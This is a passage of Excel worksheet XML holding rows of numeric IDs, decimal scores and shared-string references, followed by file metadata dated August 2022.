    <row r="7898" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7898" s="1">
        <v>7896</v>
      </c>
      <c r="B7898">
        <v>6620</v>
      </c>
      <c r="C7898">
        <v>6620</v>
      </c>
      <c r="D7898">
        <v>4</v>
      </c>
      <c r="E7898">
        <v>0.99309998750686646</v>
      </c>
      <c r="F7898" t="s">
        <v>13461</v>
      </c>
      <c r="G7898" t="s">
        <v>15620</v>
      </c>
      <c r="H7898" t="s">
        <v>15621</v>
      </c>
    </row>
    <row r="7899" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7899" s="1">
        <v>7897</v>
      </c>
      <c r="B7899">
        <v>6619</v>
      </c>
      <c r="C7899">
        <v>6619</v>
      </c>
      <c r="D7899">
        <v>4</v>
      </c>
      <c r="E7899">
        <v>0.97119998931884766</v>
      </c>
      <c r="F7899" t="s">
        <v>13461</v>
      </c>
      <c r="G7899" t="s">
        <v>15622</v>
      </c>
      <c r="H7899" t="s">
        <v>15623</v>
      </c>
    </row>
    <row r="7900" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7900" s="1">
        <v>7898</v>
      </c>
      <c r="B7900">
        <v>6618</v>
      </c>
      <c r="C7900">
        <v>6618</v>
      </c>
      <c r="D7900">
        <v>4</v>
      </c>
      <c r="E7900">
        <v>0.99800002574920654</v>
      </c>
      <c r="F7900" t="s">
        <v>13461</v>
      </c>
      <c r="G7900" t="s">
        <v>15624</v>
      </c>
      <c r="H7900" t="s">
        <v>15625</v>
      </c>
    </row>
    <row r="7901" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7901" s="1">
        <v>7899</v>
      </c>
      <c r="B7901">
        <v>6617</v>
      </c>
      <c r="C7901">
        <v>6617</v>
      </c>
      <c r="D7901">
        <v>4</v>
      </c>
      <c r="E7901">
        <v>0.61479997634887695</v>
      </c>
      <c r="F7901" t="s">
        <v>13461</v>
      </c>
      <c r="G7901" t="s">
        <v>15626</v>
      </c>
      <c r="H7901" t="s">
        <v>15627</v>
      </c>
    </row>
    <row r="7902" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7902" s="1">
        <v>7900</v>
      </c>
      <c r="B7902">
        <v>6616</v>
      </c>
      <c r="C7902">
        <v>6616</v>
      </c>
      <c r="D7902">
        <v>4</v>
      </c>
      <c r="E7902">
        <v>0.51660001277923584</v>
      </c>
      <c r="F7902" t="s">
        <v>13461</v>
      </c>
      <c r="G7902" t="s">
        <v>15628</v>
      </c>
      <c r="H7902" t="s">
        <v>15629</v>
      </c>
    </row>
    <row r="7903" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7903" s="1">
        <v>7901</v>
      </c>
      <c r="B7903">
        <v>6615</v>
      </c>
      <c r="C7903">
        <v>6615</v>
      </c>
      <c r="D7903">
        <v>4</v>
      </c>
      <c r="E7903">
        <v>0.743399977684021</v>
      </c>
      <c r="F7903" t="s">
        <v>13461</v>
      </c>
      <c r="G7903" t="s">
        <v>15630</v>
      </c>
      <c r="H7903" t="s">
        <v>15631</v>
      </c>
    </row>
    <row r="7904" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7904" s="1">
        <v>7902</v>
      </c>
      <c r="B7904">
        <v>6613</v>
      </c>
      <c r="C7904">
        <v>6613</v>
      </c>
      <c r="D7904">
        <v>4</v>
      </c>
      <c r="E7904">
        <v>0.9035000205039978</v>
      </c>
      <c r="F7904" t="s">
        <v>13461</v>
      </c>
      <c r="G7904" t="s">
        <v>15632</v>
      </c>
      <c r="H7904" t="s">
        <v>15633</v>
      </c>
    </row>
    <row r="7905" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7905" s="1">
        <v>7903</v>
      </c>
      <c r="B7905">
        <v>6612</v>
      </c>
      <c r="C7905">
        <v>6612</v>
      </c>
      <c r="D7905">
        <v>4</v>
      </c>
      <c r="E7905">
        <v>0.99229997396469116</v>
      </c>
      <c r="F7905" t="s">
        <v>13461</v>
      </c>
      <c r="G7905" t="s">
        <v>15634</v>
      </c>
      <c r="H7905" t="s">
        <v>15635</v>
      </c>
    </row>
    <row r="7906" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7906" s="1">
        <v>7904</v>
      </c>
      <c r="B7906">
        <v>6611</v>
      </c>
      <c r="C7906">
        <v>6611</v>
      </c>
      <c r="D7906">
        <v>4</v>
      </c>
      <c r="E7906">
        <v>0.70560002326965332</v>
      </c>
      <c r="F7906" t="s">
        <v>13461</v>
      </c>
      <c r="G7906" t="s">
        <v>15636</v>
      </c>
      <c r="H7906" t="s">
        <v>15637</v>
      </c>
    </row>
    <row r="7907" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7907" s="1">
        <v>7905</v>
      </c>
      <c r="B7907">
        <v>6621</v>
      </c>
      <c r="C7907">
        <v>6621</v>
      </c>
      <c r="D7907">
        <v>4</v>
      </c>
      <c r="E7907">
        <v>0.9757000207901001</v>
      </c>
      <c r="F7907" t="s">
        <v>13461</v>
      </c>
      <c r="G7907" t="s">
        <v>15638</v>
      </c>
      <c r="H7907" t="s">
        <v>15639</v>
      </c>
    </row>
    <row r="7908" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7908" s="1">
        <v>7906</v>
      </c>
      <c r="B7908">
        <v>2910</v>
      </c>
      <c r="C7908">
        <v>2910</v>
      </c>
      <c r="D7908">
        <v>4</v>
      </c>
      <c r="E7908">
        <v>0.86949998140335083</v>
      </c>
      <c r="F7908" t="s">
        <v>13461</v>
      </c>
      <c r="G7908" t="s">
        <v>15640</v>
      </c>
      <c r="H7908" t="s">
        <v>15641</v>
      </c>
    </row>
    <row r="7909" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7909" s="1">
        <v>7907</v>
      </c>
      <c r="B7909">
        <v>2908</v>
      </c>
      <c r="C7909">
        <v>2908</v>
      </c>
      <c r="D7909">
        <v>4</v>
      </c>
      <c r="E7909">
        <v>0.65189999341964722</v>
      </c>
      <c r="F7909" t="s">
        <v>13461</v>
      </c>
      <c r="G7909" t="s">
        <v>15642</v>
      </c>
      <c r="H7909" t="s">
        <v>15643</v>
      </c>
    </row>
    <row r="7910" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7910" s="1">
        <v>7908</v>
      </c>
      <c r="B7910">
        <v>6652</v>
      </c>
      <c r="C7910">
        <v>6652</v>
      </c>
      <c r="D7910">
        <v>4</v>
      </c>
      <c r="E7910">
        <v>0.99320000410079956</v>
      </c>
      <c r="F7910" t="s">
        <v>13461</v>
      </c>
      <c r="G7910" t="s">
        <v>15644</v>
      </c>
      <c r="H7910" t="s">
        <v>15645</v>
      </c>
    </row>
    <row r="7911" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7911" s="1">
        <v>7909</v>
      </c>
      <c r="B7911">
        <v>2781</v>
      </c>
      <c r="C7911">
        <v>2781</v>
      </c>
      <c r="D7911">
        <v>4</v>
      </c>
      <c r="E7911">
        <v>0.65649998188018799</v>
      </c>
      <c r="F7911" t="s">
        <v>13461</v>
      </c>
      <c r="G7911" t="s">
        <v>15646</v>
      </c>
      <c r="H7911" t="s">
        <v>15647</v>
      </c>
    </row>
    <row r="7912" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7912" s="1">
        <v>7910</v>
      </c>
      <c r="B7912">
        <v>2783</v>
      </c>
      <c r="C7912">
        <v>2783</v>
      </c>
      <c r="D7912">
        <v>4</v>
      </c>
      <c r="E7912">
        <v>0.62870001792907715</v>
      </c>
      <c r="F7912" t="s">
        <v>13461</v>
      </c>
      <c r="G7912" t="s">
        <v>15648</v>
      </c>
      <c r="H7912" t="s">
        <v>15649</v>
      </c>
    </row>
    <row r="7913" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7913" s="1">
        <v>7911</v>
      </c>
      <c r="B7913">
        <v>2784</v>
      </c>
      <c r="C7913">
        <v>2784</v>
      </c>
      <c r="D7913">
        <v>4</v>
      </c>
      <c r="E7913">
        <v>0.98750001192092896</v>
      </c>
      <c r="F7913" t="s">
        <v>13461</v>
      </c>
      <c r="G7913" t="s">
        <v>15650</v>
      </c>
      <c r="H7913" t="s">
        <v>15651</v>
      </c>
    </row>
    <row r="7914" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7914" s="1">
        <v>7912</v>
      </c>
      <c r="B7914">
        <v>2786</v>
      </c>
      <c r="C7914">
        <v>2786</v>
      </c>
      <c r="D7914">
        <v>4</v>
      </c>
      <c r="E7914">
        <v>0.66339999437332153</v>
      </c>
      <c r="F7914" t="s">
        <v>13461</v>
      </c>
      <c r="G7914" t="s">
        <v>15652</v>
      </c>
      <c r="H7914" t="s">
        <v>15653</v>
      </c>
    </row>
    <row r="7915" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7915" s="1">
        <v>7913</v>
      </c>
      <c r="B7915">
        <v>2789</v>
      </c>
      <c r="C7915">
        <v>2789</v>
      </c>
      <c r="D7915">
        <v>4</v>
      </c>
      <c r="E7915">
        <v>0.83929997682571411</v>
      </c>
      <c r="F7915" t="s">
        <v>13461</v>
      </c>
      <c r="G7915" t="s">
        <v>15654</v>
      </c>
      <c r="H7915" t="s">
        <v>15655</v>
      </c>
    </row>
    <row r="7916" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7916" s="1">
        <v>7914</v>
      </c>
      <c r="B7916">
        <v>2795</v>
      </c>
      <c r="C7916">
        <v>2795</v>
      </c>
      <c r="D7916">
        <v>4</v>
      </c>
      <c r="E7916">
        <v>0.39829999208450317</v>
      </c>
      <c r="F7916" t="s">
        <v>13461</v>
      </c>
      <c r="G7916" t="s">
        <v>15656</v>
      </c>
      <c r="H7916" t="s">
        <v>15657</v>
      </c>
    </row>
    <row r="7917" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7917" s="1">
        <v>7915</v>
      </c>
      <c r="B7917">
        <v>2818</v>
      </c>
      <c r="C7917">
        <v>2818</v>
      </c>
      <c r="D7917">
        <v>4</v>
      </c>
      <c r="E7917">
        <v>0.78920000791549683</v>
      </c>
      <c r="F7917" t="s">
        <v>13461</v>
      </c>
      <c r="G7917" t="s">
        <v>15658</v>
      </c>
      <c r="H7917" t="s">
        <v>15659</v>
      </c>
    </row>
    <row r="7918" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7918" s="1">
        <v>7916</v>
      </c>
      <c r="B7918">
        <v>2828</v>
      </c>
      <c r="C7918">
        <v>2828</v>
      </c>
      <c r="D7918">
        <v>4</v>
      </c>
      <c r="E7918">
        <v>0.67650002241134644</v>
      </c>
      <c r="F7918" t="s">
        <v>13461</v>
      </c>
      <c r="G7918" t="s">
        <v>15660</v>
      </c>
      <c r="H7918" t="s">
        <v>15661</v>
      </c>
    </row>
    <row r="7919" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7919" s="1">
        <v>7917</v>
      </c>
      <c r="B7919">
        <v>2832</v>
      </c>
      <c r="C7919">
        <v>2832</v>
      </c>
      <c r="D7919">
        <v>4</v>
      </c>
      <c r="E7919">
        <v>0.73680001497268677</v>
      </c>
      <c r="F7919" t="s">
        <v>13461</v>
      </c>
      <c r="G7919" t="s">
        <v>15662</v>
      </c>
      <c r="H7919" t="s">
        <v>15663</v>
      </c>
    </row>
    <row r="7920" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7920" s="1">
        <v>7918</v>
      </c>
      <c r="B7920">
        <v>2846</v>
      </c>
      <c r="C7920">
        <v>2846</v>
      </c>
      <c r="D7920">
        <v>4</v>
      </c>
      <c r="E7920">
        <v>0.53670001029968262</v>
      </c>
      <c r="F7920" t="s">
        <v>13461</v>
      </c>
      <c r="G7920" t="s">
        <v>15664</v>
      </c>
      <c r="H7920" t="s">
        <v>15665</v>
      </c>
    </row>
    <row r="7921" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7921" s="1">
        <v>7919</v>
      </c>
      <c r="B7921">
        <v>2847</v>
      </c>
      <c r="C7921">
        <v>2847</v>
      </c>
      <c r="D7921">
        <v>4</v>
      </c>
      <c r="E7921">
        <v>0.56480002403259277</v>
      </c>
      <c r="F7921" t="s">
        <v>13461</v>
      </c>
      <c r="G7921" t="s">
        <v>15666</v>
      </c>
      <c r="H7921" t="s">
        <v>15667</v>
      </c>
    </row>
    <row r="7922" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7922" s="1">
        <v>7920</v>
      </c>
      <c r="B7922">
        <v>2850</v>
      </c>
      <c r="C7922">
        <v>2850</v>
      </c>
      <c r="D7922">
        <v>4</v>
      </c>
      <c r="E7922">
        <v>0.99299997091293335</v>
      </c>
      <c r="F7922" t="s">
        <v>13461</v>
      </c>
      <c r="G7922" t="s">
        <v>15668</v>
      </c>
      <c r="H7922" t="s">
        <v>15669</v>
      </c>
    </row>
    <row r="7923" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7923" s="1">
        <v>7921</v>
      </c>
      <c r="B7923">
        <v>6670</v>
      </c>
      <c r="C7923">
        <v>6670</v>
      </c>
      <c r="D7923">
        <v>4</v>
      </c>
      <c r="E7923">
        <v>0.94330000877380371</v>
      </c>
      <c r="F7923" t="s">
        <v>13461</v>
      </c>
      <c r="G7923" t="s">
        <v>15670</v>
      </c>
      <c r="H7923" t="s">
        <v>15671</v>
      </c>
    </row>
    <row r="7924" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7924" s="1">
        <v>7922</v>
      </c>
      <c r="B7924">
        <v>2851</v>
      </c>
      <c r="C7924">
        <v>2851</v>
      </c>
      <c r="D7924">
        <v>4</v>
      </c>
      <c r="E7924">
        <v>0.83090001344680786</v>
      </c>
      <c r="F7924" t="s">
        <v>13461</v>
      </c>
      <c r="G7924" t="s">
        <v>15672</v>
      </c>
      <c r="H7924" t="s">
        <v>15673</v>
      </c>
    </row>
    <row r="7925" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7925" s="1">
        <v>7923</v>
      </c>
      <c r="B7925">
        <v>6667</v>
      </c>
      <c r="C7925">
        <v>6667</v>
      </c>
      <c r="D7925">
        <v>4</v>
      </c>
      <c r="E7925">
        <v>0.97970002889633179</v>
      </c>
      <c r="F7925" t="s">
        <v>13461</v>
      </c>
      <c r="G7925" t="s">
        <v>15674</v>
      </c>
      <c r="H7925" t="s">
        <v>15675</v>
      </c>
    </row>
    <row r="7926" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7926" s="1">
        <v>7924</v>
      </c>
      <c r="B7926">
        <v>2854</v>
      </c>
      <c r="C7926">
        <v>2854</v>
      </c>
      <c r="D7926">
        <v>4</v>
      </c>
      <c r="E7926">
        <v>0.60110002756118774</v>
      </c>
      <c r="F7926" t="s">
        <v>13461</v>
      </c>
      <c r="G7926" t="s">
        <v>15676</v>
      </c>
      <c r="H7926" t="s">
        <v>15677</v>
      </c>
    </row>
    <row r="7927" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7927" s="1">
        <v>7925</v>
      </c>
      <c r="B7927">
        <v>6663</v>
      </c>
      <c r="C7927">
        <v>6663</v>
      </c>
      <c r="D7927">
        <v>4</v>
      </c>
      <c r="E7927">
        <v>0.95490002632141113</v>
      </c>
      <c r="F7927" t="s">
        <v>13461</v>
      </c>
      <c r="G7927" t="s">
        <v>15678</v>
      </c>
      <c r="H7927" t="s">
        <v>15679</v>
      </c>
    </row>
    <row r="7928" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7928" s="1">
        <v>7926</v>
      </c>
      <c r="B7928">
        <v>6662</v>
      </c>
      <c r="C7928">
        <v>6662</v>
      </c>
      <c r="D7928">
        <v>4</v>
      </c>
      <c r="E7928">
        <v>0.62529999017715454</v>
      </c>
      <c r="F7928" t="s">
        <v>13461</v>
      </c>
      <c r="G7928" t="s">
        <v>15680</v>
      </c>
      <c r="H7928" t="s">
        <v>15681</v>
      </c>
    </row>
    <row r="7929" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7929" s="1">
        <v>7927</v>
      </c>
      <c r="B7929">
        <v>2862</v>
      </c>
      <c r="C7929">
        <v>2862</v>
      </c>
      <c r="D7929">
        <v>4</v>
      </c>
      <c r="E7929">
        <v>0.77590000629425049</v>
      </c>
      <c r="F7929" t="s">
        <v>13461</v>
      </c>
      <c r="G7929" t="s">
        <v>15682</v>
      </c>
      <c r="H7929" t="s">
        <v>15683</v>
      </c>
    </row>
    <row r="7930" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7930" s="1">
        <v>7928</v>
      </c>
      <c r="B7930">
        <v>2885</v>
      </c>
      <c r="C7930">
        <v>2885</v>
      </c>
      <c r="D7930">
        <v>4</v>
      </c>
      <c r="E7930">
        <v>0.87029999494552612</v>
      </c>
      <c r="F7930" t="s">
        <v>13461</v>
      </c>
      <c r="G7930" t="s">
        <v>15684</v>
      </c>
      <c r="H7930" t="s">
        <v>15685</v>
      </c>
    </row>
    <row r="7931" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7931" s="1">
        <v>7929</v>
      </c>
      <c r="B7931">
        <v>2886</v>
      </c>
      <c r="C7931">
        <v>2886</v>
      </c>
      <c r="D7931">
        <v>4</v>
      </c>
      <c r="E7931">
        <v>0.99949997663497925</v>
      </c>
      <c r="F7931" t="s">
        <v>13461</v>
      </c>
      <c r="G7931" t="s">
        <v>15686</v>
      </c>
      <c r="H7931" t="s">
        <v>15687</v>
      </c>
    </row>
    <row r="7932" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7932" s="1">
        <v>7930</v>
      </c>
      <c r="B7932">
        <v>1666</v>
      </c>
      <c r="C7932">
        <v>1666</v>
      </c>
      <c r="D7932">
        <v>4</v>
      </c>
      <c r="E7932">
        <v>0.39980000257492071</v>
      </c>
      <c r="F7932" t="s">
        <v>13461</v>
      </c>
      <c r="G7932" t="s">
        <v>15688</v>
      </c>
      <c r="H7932" t="s">
        <v>15689</v>
      </c>
    </row>
    <row r="7933" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7933" s="1">
        <v>7931</v>
      </c>
      <c r="B7933">
        <v>6754</v>
      </c>
      <c r="C7933">
        <v>6754</v>
      </c>
      <c r="D7933">
        <v>4</v>
      </c>
      <c r="E7933">
        <v>0.98199999332427979</v>
      </c>
      <c r="F7933" t="s">
        <v>13461</v>
      </c>
      <c r="G7933" t="s">
        <v>15690</v>
      </c>
      <c r="H7933" t="s">
        <v>15691</v>
      </c>
    </row>
  </sheetData>
  <phoneticPr fontId="3" type="noConversion"/>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b</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-19T06:36:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-22T02:40:19Z</dcterms:modified>
</cp:coreProperties>
</file>